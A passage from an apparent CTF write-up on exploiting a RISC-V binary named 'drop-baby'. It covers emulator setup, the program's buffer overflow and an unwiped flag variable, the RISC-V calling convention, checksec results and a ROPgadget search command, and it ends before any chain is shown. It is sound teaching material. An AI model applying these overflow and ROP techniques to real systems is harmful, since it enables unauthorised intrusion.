</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/tubes/process.py&#34;</span>, line 518, in _validate
</span></span><span style=display:flex><span>    argv, env <span style=color:#f92672>=</span> normalize_argv_env<span style=color:#f92672>(</span>argv, env, self, 4<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/util/misc.py&#34;</span>, line 204, in normalize_argv_env
</span></span><span style=display:flex><span>    log.error<span style=color:#f92672>(</span><span style=color:#e6db74>&#34;argv must be strings or bytes: %r&#34;</span> % argv<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/log.py&#34;</span>, line 439, in error
</span></span><span style=display:flex><span>    raise PwnlibException<span style=color:#f92672>(</span>message % args<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>pwnlib.exception.PwnlibException: argv must be strings or bytes: <span style=color:#f92672>[</span>None, <span style=color:#e6db74>&#39;--help&#39;</span><span style=color:#f92672>]</span>
</span></span></code></pre></div><p>From the error message <code>Neither 'qemu-riscv' nor 'qemu-riscv-static' are available</code>, it seems that pwntools searches for the <code>qemu-riscv</code> and <code>qemu-riscv-static</code> binaries. Let&rsquo;s help it by making them point to <code>qemu-riscv32</code> and <code>qemu-riscv32-static</code> correspondingly.</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ ln -s /usr/bin/qemu-riscv32 qemu-riscv
</span></span><span style=display:flex><span>nikos@ctf-box:~$ ln -s /usr/bin/qemu-riscv32-static qemu-riscv-static
</span></span><span style=display:flex><span>nikos@ctf-box:~$ export PATH<span style=color:#f92672>=</span><span style=color:#e6db74>&#34;</span>$PATH<span style=color:#e6db74>:</span><span style=color:#66d9ef>$(</span>pwd<span style=color:#66d9ef>)</span><span style=color:#e6db74>&#34;</span>
</span></span><span style=display:flex><span>nikos@ctf-box:~$ ls
</span></span><span style=display:flex><span>drop-baby  minimal-template.py  qemu-riscv  qemu-riscv-static  flag.txt
</span></span></code></pre></div><p>Let&rsquo;s try again now:</p><p><img src=/post-resources/riscv-pwn/pwntools-gdb.png alt=pwntools-gdb.png></p><p>Perfect! Our RSIC-V pwning environment complete and we can start exploiting (finally)!</p><h2 id=source-code>Source code</h2><p>I won&rsquo;t bore you with the reversing of the <code>drop-baby</code> binary. The goal is to get the flag and with that let&rsquo;s jump straight into the buggy code:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span><span style=color:#66d9ef>int</span> <span style=color:#a6e22e>main</span>() {
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>setvbuf</span>(stdout,NULL,<span style=color:#ae81ff>2</span>,<span style=color:#ae81ff>0</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>char</span> <span style=color:#f92672>*</span>flag <span style=color:#f92672>=</span> <span style=color:#a6e22e>getenv</span>(<span style=color:#e6db74>&#34;FLAG&#34;</span>);
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (flag <span style=color:#f92672>==</span> NULL) {
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>puts</span>(<span style=color:#e6db74>&#34;No flag present&#34;</span>);
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>exit</span>(<span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>);
</span></span><span style=display:flex><span>  }
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#75715e>//Crete flag.txt file.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#75715e>//Read and write permissions for the owner of the file, and with no permissions for other users.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#66d9ef>int</span> flag_fd <span style=color:#f92672>=</span> <span style=color:#a6e22e>open</span>(<span style=color:#e6db74>&#34;flag.txt&#34;</span>, O_CREAT <span style=color:#f92672>|</span> O_WRONLY, <span style=color:#ae81ff>384</span>);
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (flag_fd <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>) {
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>printf</span>(<span style=color:#e6db74>&#34;Errno = %d trying to open flag.txt</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, errno);
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>exit</span>(<span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>);
</span></span><span style=display:flex><span>  }
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>size_t</span> sVar2 <span style=color:#f92672>=</span> <span style=color:#a6e22e>write</span>(flag_fd,flag,<span style=color:#a6e22e>strlen</span>(flag));
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (sVar2 <span style=color:#f92672>!=</span> <span style=color:#a6e22e>strlen</span>(flag)) {
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>puts</span>(<span style=color:#e6db74>&#34;Unable to write flag to file&#34;</span>);
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>exit</span>(<span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>);
</span></span><span style=display:flex><span>  }
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>close</span>(flag_fd);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#75715e>//!!! BUG: environment variable `FLAG` does not get wiped from memory. So, even if unsetenv
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#75715e>//is invoked, the value of the `FLAG` environment variable is still somewhere on the stack.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#66d9ef>if</span> (<span style=color:#a6e22e>unsetenv</span>(<span style=color:#e6db74>&#34;FLAG&#34;</span>) <span style=color:#f92672>==</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>) {
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>puts</span>(<span style=color:#e6db74>&#34;Unable to clear environment&#34;</span>);
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>exit</span>(<span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>);
</span></span><span style=display:flex><span>  }
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#75715e>//setup timeout signal based on `TIMEOUT` environment variable.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  ulong timeout;
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>char</span> <span style=color:#f92672>*</span>timeout_str <span style=color:#f92672>=</span> <span style=color:#a6e22e>getenv</span>(<span style=color:#e6db74>&#34;TIMEOUT&#34;</span>);
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (timeout_str <span style=color:#f92672>==</span> NULL) {
</span></span><span style=display:flex><span>    timeout <span style=color:#f92672>=</span> <span style=color:#ae81ff>10</span>;
</span></span><span style=display:flex><span>  } <span style=color:#66d9ef>else</span> {
</span></span><span style=display:flex><span>    timeout <span style=color:#f92672>=</span> <span style=color:#a6e22e>strtoul</span>(timeout_str,NULL,<span style=color:#ae81ff>10</span>);
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> (timeout <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>) {
</span></span><span style=display:flex><span>      timeout <span style=color:#f92672>=</span> <span style=color:#ae81ff>10</span>;
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>  }
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>signal</span>(<span style=color:#ae81ff>0xe</span>,alarm_handler); <span style=color:#75715e>//puts(&#34;Time\&#39;s up!&#34;); exit(1);
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#a6e22e>alarm</span>(timeout);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>puts</span>(<span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>Baby</span><span style=color:#ae81ff>\&#39;</span><span style=color:#e6db74>s Second RISC-V Stack Smash</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>puts</span>(<span style=color:#e6db74>&#34;No free pointers this time and pwning might be more difficult!&#34;</span>);
</span></span><span style=display:flex><span>  <span style=color:#a6e22e>puts</span>(<span style=color:#e6db74>&#34;Exploit me!&#34;</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>do</span> {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> (<span style=color:#a6e22e>syncronize</span>() <span style=color:#f92672>==</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>) <span style=color:#75715e>//`synchronize()` expects the following input: `\xde\xad\xbe\xef`
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>      <span style=color:#66d9ef>return</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>int</span> res <span style=color:#f92672>=</span> <span style=color:#a6e22e>read_message</span>();
</span></span><span style=display:flex><span>  } <span style=color:#66d9ef>while</span> (res <span style=color:#f92672>!=</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>);
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>return</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>int</span> <span style=color:#a6e22e>read_message</span>(<span style=color:#66d9ef>void</span>) {
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>char</span> control_chr;
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>ssize_t</span> nread <span style=color:#f92672>=</span> <span style=color:#a6e22e>read</span>(<span style=color:#ae81ff>0</span>,<span style=color:#f92672>&amp;</span>control_chr,<span style=color:#ae81ff>1</span>);
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (nread <span style=color:#f92672>!=</span> <span style=color:#ae81ff>1</span>)
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#75715e>//`control_chr` can be one of the following:
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#75715e>//  &#39;\xa1&#39;, &#39;\xa2&#39;, &#39;\xb1&#39;, &#39;\xb2&#39;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#75715e>//Only &#39;\xb2&#39; is relevant to us.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  <span style=color:#66d9ef>if</span> (control_chr <span style=color:#f92672>==</span> <span style=color:#e6db74>&#39;\xb2&#39;</span>) {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#a6e22e>do_b2</span>();
</span></span><span style=display:flex><span>  } <span style=color:#66d9ef>else</span> {
</span></span><span style=display:flex><span>    <span style=color:#75715e>//...
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  }
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>return</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>int</span> <span style=color:#a6e22e>do_b2</span>() {
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>char</span> acStack_78 [<span style=color:#ae81ff>100</span>];
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (<span style=color:#a6e22e>read</span>(<span style=color:#ae81ff>0</span>,acStack_78,sz) <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>300</span>) { <span style=color:#75715e>//!!! BUG: BufferOverflow here.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>    <span style=color:#66d9ef>return</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>  }
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>if</span> (<span style=color:#a6e22e>check_message_crc</span>(acStack_78,<span style=color:#ae81ff>300</span>) <span style=color:#f92672>==</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>) <span style=color:#75715e>//dumb CRC32 check. Last 4 bytes of input is the CRC32.
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>    <span style=color:#66d9ef>return</span> <span style=color:#f92672>-</span><span style=color:#ae81ff>1</span>;
</span></span><span style=display:flex><span>  <span style=color:#66d9ef>return</span> <span style=color:#ae81ff>0</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p>Here are the juicy parts from the code above:</p><ul><li>The binary reads two environment variables: <code>FLAG</code> and <code>TIMEOUT</code>.</li><li><code>TIMEOUT</code> is (classically) used to prevent us from leaving open connections to the remote (nothing fancy). If not specified, it defaults to 10 seconds, so for our exploitation we will set it to something much higher (3600).</li><li><code>FLAG</code> environment variable contains the flag value and writes it to the file <code>flag.txt</code></li><li>The <code>unsetenv("FLAG")</code> function simply unsets the environment variable. However, it does <strong>not</strong> erase the memory. It simply shifts the all the elements in the <code>char *environ[]</code> array to the left by 1 (<a href=https://codebrowser.dev/glibc/glibc/stdlib/setenv.c.html#264 target=_blank rel="noopener noreferrer">setenv.c#264</a>). This means that the flag is still somewhere down the stack.</li><li><code>syncronize()</code> is a boring state machine. Required input is <code>\xde\xad\xbe\xef</code>.</li><li><code>read_message()</code> is where the program will read commands from us.<ul><li>Command <code>b2</code> reads <code>300</code> bytes into a buffer of <code>100</code> bytes. This is a <span style=color:red><em><strong>buffer overflow</strong></em></span>.</li></ul></li></ul><p>Now that we have identified the location of the buffer overflow and how to reach it, it is time to come up with a strategy to pwn the binary.</p><h2 id=detour-to-risc-v-architecture-and-abi>Detour to RISC-V architecture and ABI</h2><p>Before we attempt to exploit this buffer overflow, we need to understand our target architecture. More specifically:</p><ul><li>What is the function call convention?<ul><li>How are arguments passed to functions?</li><li>How is the control flow transferred to a function</li><li>How does a function return to its caller</li></ul></li><li>What is the syscall ABI?<ul><li>How are arguments passed to syscalls</li></ul></li><li>How does the stack behave?</li><li>Which are caller/callee saved registers?</li><li>Which <em>are</em> our registers?</li><li>How does the assembly of RISC-V look like?<ul><li>How do we access memory?</li></ul></li></ul><p>Only if we know the answer to the above questions we can start thinking about exploiting and ROPing. Otherwise, we simply do not know how to control the program counter, how gadgets look like, and how to chain them together!</p><h3 id=registers>Registers</h3><p><a href=https://msyksphinz-self.github.io/riscv-isadoc/html/regs.html#register-definitions target=_blank rel="noopener noreferrer">All Register Definitions</a></p><p><img src=/post-resources/riscv-pwn/riscv-registers.png alt=riscv-registers.png></p><h3 id=datatypes>Datatypes</h3><p><img src=/post-resources/riscv-pwn/riscv-datatypes.png alt=riscv-datatypes.png></p><h3 id=function-call-convention>Function call convention</h3><ul><li><a href=https://riscv.org/wp-content/uploads/2015/01/riscv-calling.pdf target=_blank rel="noopener noreferrer">Function call convention</a></li><li>RISC-V has a <strong>little-endian</strong> memory system.</li><li>In the standard RISC-V calling convention, the <strong>stack grows downward</strong> and the <strong>stack pointer</strong> is always kept <strong>16-byte aligned</strong>.</li><li>Function arguments are passed <strong>arguments</strong> in registers when possible. Up to eight integer registers, <code>a0</code>-<code>a7</code></li><li><strong>Return value</strong> is passed in registers <code>a0</code> and <code>a1</code>.</li></ul><p>Here is a simple example compiled using <a href=https://godbolt.org/ target=_blank rel="noopener noreferrer">godbolt.org</a>:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span><span style=color:#66d9ef>int</span> <span style=color:#a6e22e>myfunc</span>(<span style=color:#66d9ef>int</span> arg) {
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>int</span> i;
</span></span><span style=display:flex><span>    i<span style=color:#f92672>=</span>arg<span style=color:#f92672>+</span><span style=color:#ae81ff>0x20</span>;
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> i;
</span></span><span style=display:flex><span>}
</span></span><span style=display:flex><span><span style=color:#66d9ef>int</span> <span style=color:#a6e22e>main</span>() {
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>myfunc</span>(<span style=color:#ae81ff>0x10</span>);
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#ae81ff>0</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-asm data-lang=asm><span style=display:flex><span><span style=color:#a6e22e>myfunc</span>(<span style=color:#66d9ef>int</span>)-<span style=color:#ae81ff>0x2</span>:
</span></span><span style=display:flex><span> <span style=color:#a6e22e>nop</span>
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>R_RISCV_ALIGN</span> *<span style=color:#66d9ef>ABS</span>*<span style=color:#960050;background-color:#1e0010>+</span><span style=color:#ae81ff>0x2</span>
</span></span><span style=display:flex><span><span style=color:#a6e22e>myfunc</span>(<span style=color:#66d9ef>int</span>):
</span></span><span style=display:flex><span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>sp</span>,<span style=color:#66d9ef>sp</span>,-<span style=color:#ae81ff>16</span>	<span style=color:#75715e># allocate stack
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>ra</span>,<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>sp</span>)	<span style=color:#75715e># store return address
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>s0</span>,<span style=color:#ae81ff>8</span>(<span style=color:#66d9ef>sp</span>)	<span style=color:#75715e># store frame pointer
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>s0</span>,<span style=color:#66d9ef>sp</span>,<span style=color:#ae81ff>16</span>	<span style=color:#75715e># s0=sp
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>s0</span>)	<span style=color:#75715e># save arg0
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span> <span style=color:#75715e># do the opration
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>s0</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>a0</span>,<span style=color:#66d9ef>a0</span>,<span style=color:#ae81ff>0x20</span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>16</span>(<span style=color:#66d9ef>s0</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> <span style=color:#75715e># return
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>16</span>(<span style=color:#66d9ef>s0</span>)	<span style=color:#75715e># return value
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>ra</span>,<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>sp</span>)	<span style=color:#75715e># return address
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>s0</span>,<span style=color:#ae81ff>8</span>(<span style=color:#66d9ef>sp</span>)	<span style=color:#75715e># restore frame pointer
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>sp</span>,<span style=color:#66d9ef>sp</span>,<span style=color:#ae81ff>16</span>	<span style=color:#75715e># deallocate stack
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>ret</span>			<span style=color:#75715e># pseudo-instruction: jalr x0, ra, 0
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span>main:
</span></span><span style=display:flex><span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>sp</span>,<span style=color:#66d9ef>sp</span>,-<span style=color:#ae81ff>16</span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>ra</span>,<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>sp</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>s0</span>,<span style=color:#ae81ff>8</span>(<span style=color:#66d9ef>sp</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>s0</span>,<span style=color:#66d9ef>sp</span>,<span style=color:#ae81ff>16</span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>li</span>	<span style=color:#66d9ef>a0</span>,<span style=color:#ae81ff>0</span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>16</span>(<span style=color:#66d9ef>s0</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>sw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>s0</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> <span style=color:#75715e># prepare for function call to myfunc()
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>li</span>	<span style=color:#66d9ef>a0</span>,<span style=color:#ae81ff>0x10</span>	<span style=color:#75715e># setup arg1
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span> <span style=color:#75715e># compute address of myfunc using relative addressing
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#75715e># and then call it using jalr
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> <span style=color:#a6e22e>auipc</span>	<span style=color:#66d9ef>ra</span>,<span style=color:#ae81ff>0x0</span>
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>R_RISCV_CALL_PLT</span> <span style=color:#66d9ef>myfunc</span>(<span style=color:#66d9ef>int</span>)
</span></span><span style=display:flex><span>    <span style=color:#a6e22e>R_RISCV_RELAX</span> *<span style=color:#66d9ef>ABS</span>*
</span></span><span style=display:flex><span> <span style=color:#a6e22e>jalr</span>	<span style=color:#66d9ef>ra</span>	<span style=color:#75715e># 3a &lt;main+0x14&gt;
</span></span></span><span style=display:flex><span><span style=color:#75715e></span> 
</span></span><span style=display:flex><span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>a0</span>,-<span style=color:#ae81ff>16</span>(<span style=color:#66d9ef>s0</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>ra</span>,<span style=color:#ae81ff>12</span>(<span style=color:#66d9ef>sp</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>lw</span>	<span style=color:#66d9ef>s0</span>,<span style=color:#ae81ff>8</span>(<span style=color:#66d9ef>sp</span>)
</span></span><span style=display:flex><span> <span style=color:#a6e22e>addi</span>	<span style=color:#66d9ef>sp</span>,<span style=color:#66d9ef>sp</span>,<span style=color:#ae81ff>16</span>
</span></span><span style=display:flex><span> <span style=color:#a6e22e>ret</span>
</span></span></code></pre></div><h3 id=other>Other</h3><ul><li><a href=https://github.com/riscv-non-isa/riscv-asm-manual/blob/master/riscv-asm.md#load-and-store-global target=_blank rel="noopener noreferrer"><strong>RISC-V Assembly Programmer&rsquo;s Manual</strong></a> - Very good resource.</li><li><a href=https://mark.theis.site/riscv/ target=_blank rel="noopener noreferrer">RISC-V instruction set cheatsheet</a></li><li><a href=https://msyksphinz-self.github.io/riscv-isadoc/html/index.html target=_blank rel="noopener noreferrer">RISC-V instruction set reference</a></li><li><a href=https://github.com/riscv-non-isa/riscv-asm-manual/blob/master/riscv-asm.md#-a-listing-of-standard-risc-v-pseudoinstructions target=_blank rel="noopener noreferrer">Pseudo-instructions</a></li><li><a href=https://github.com/riscv-non-isa/riscv-asm-manual/blob/master/riscv-asm.md#-a-listing-of-standard-risc-v-pseudoinstructions target=_blank rel="noopener noreferrer">Assembler directives</a></li><li><a href=https://github.com/riscv-non-isa/riscv-asm-manual/blob/master/riscv-asm.md#labels target=_blank rel="noopener noreferrer">Relative/Absolute addressing, labels, GOT accessing</a></li><li><a href=https://github.com/riscv-non-isa/riscv-asm-manual/blob/master/riscv-asm.md#load-and-store-global target=_blank rel="noopener noreferrer">Load & Store</a></li></ul><h2 id=pwning>Pwning</h2><p>Now that we know our architecture, let&rsquo;s identify the binary&rsquo;s security properties and come up with an exploitation strategy:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ checksec --file<span style=color:#f92672>=</span>./drop-baby
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> <span style=color:#e6db74>&#39;~/drop-baby&#39;</span>
</span></span><span style=display:flex><span>    Arch:     riscv-32-little
</span></span><span style=display:flex><span>    RELRO:    Partial RELRO
</span></span><span style=display:flex><span>    Stack:    No canary found
</span></span><span style=display:flex><span>    NX:       NX enabled
</span></span><span style=display:flex><span>    PIE:      No PIE <span style=color:#f92672>(</span>0x10000<span style=color:#f92672>)</span>
</span></span></code></pre></div><p>Great, no PIE!. Let&rsquo;s search for useful gadgets using <a href=https://github.com/JonathanSalwan/ROPgadget target=_blank rel="noopener noreferrer">ROPgadget</a>. Generally, we want to control:</p><ul><li><code>a0,a1,a2,...</code> when making function calls as these are the argument registers</li><li><code>ra</code> as this is the return address where a function call should return when finished</li><li>Find <code>jr</code> and <code>jalr</code> gadgets as these will compose our ROP chain.</li></ul><p>Also, we notice in the disassembly that many instructions start with the <code>c.</code> prefix. These are compressed 16-bit instructions (RCV) instead of the regular 32-bit instructions and are referred in the <a href=https://riscv.org/wp-content/uploads/2019/06/riscv-spec.pdf target=_blank rel="noopener noreferrer">&ldquo;C&rdquo; Standard Extension for Compressed Instructions in the RISC-V ISA</a>:</p><blockquote><p>The &ldquo;C&rdquo; extension can be added to any of the base ISAs (RV32,<br>RV64, RV128), and we use the generic term “RVC” to cover any of these. Typically, 50%–60% of the RISC-V instructions in a program can be replaced with RVC instructions, resulting in a 25%–30% code-size reduction.</p><p>RVC uses a simple compression scheme that offers shorter 16-bit versions of common 32-bit RISC-V instructions</p><p>The C extension is compatible with all other standard instruction extensions. The C extension allows 16-bit instructions to be freely intermixed with 32-bit instructions, with the latter now able to start on any 16-bit boundary.</p></blockquote><p>Here is a one liner to search for gadgets in our binary:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>ROPgadget --binary drop-baby --align <span style=color:#ae81ff>4</span> <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>  | grep -E <span style=color:#e6db74>&#39;sw|swsp|lw|lwsp|mv|sub|add|xor|jr|jalr|ret|ecall&#39;</span> <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>  | grep -E <span style=color:#e6db74>&#39;; (ret)|((c\.)?j(al)?r (x[0-9]{1,2}|zero|ra|sp|gp|tp|s[0-9]{1,2}|t[0-6]|fp|a[0-7]))$&#39;</span> <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>  | tee gadgets.log
</span></span></code></pre></div><ul><li>The first regex will filter gadgets that have only relevant opcodes to us.</li><li>The second regex is about how the gadget should end. All of our gadgets will end with either <code>jr</code> or <code>jalr</code> with a register as argument.<ul><li><code>ret</code> is the same as <code>jalr x0, ra, 0</code></li><li><code>ret</code> is the same as <code>jr ra</code></li><li>If we are doing function calls, we want our gadgets to <strong>not</strong> end with <code>j(al)?r ra</code>. This is because the function call will use the <code>ra</code> register in the <code>ret</code> instruction to return to our next ROP gadget.</li></ul></li><li>We are interested in the <code>lwsp</code> gadgets as these gadgets can directly load values from the stack (which we control) into our registers</li><li><code>ecall</code> is uses for invoking syscalls, but we have libc statically linked so we don&rsquo;t use it.</li><li>Since our binary supports the <code>c.</code> prefix, we can also <code>--align 2</code> instead of <code>4</code>.</li></ul><p>Here are some example good quality gadgets:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-asm data-lang=asm><span style=display:flex><span><span style=color:#75715e># Control a bunch or registers
</span></span></span><span style=display:flex><span><span style=color:#75715e></span><span style=color:#960050;background-color:#1e0010>0</span>x0001a7e8:
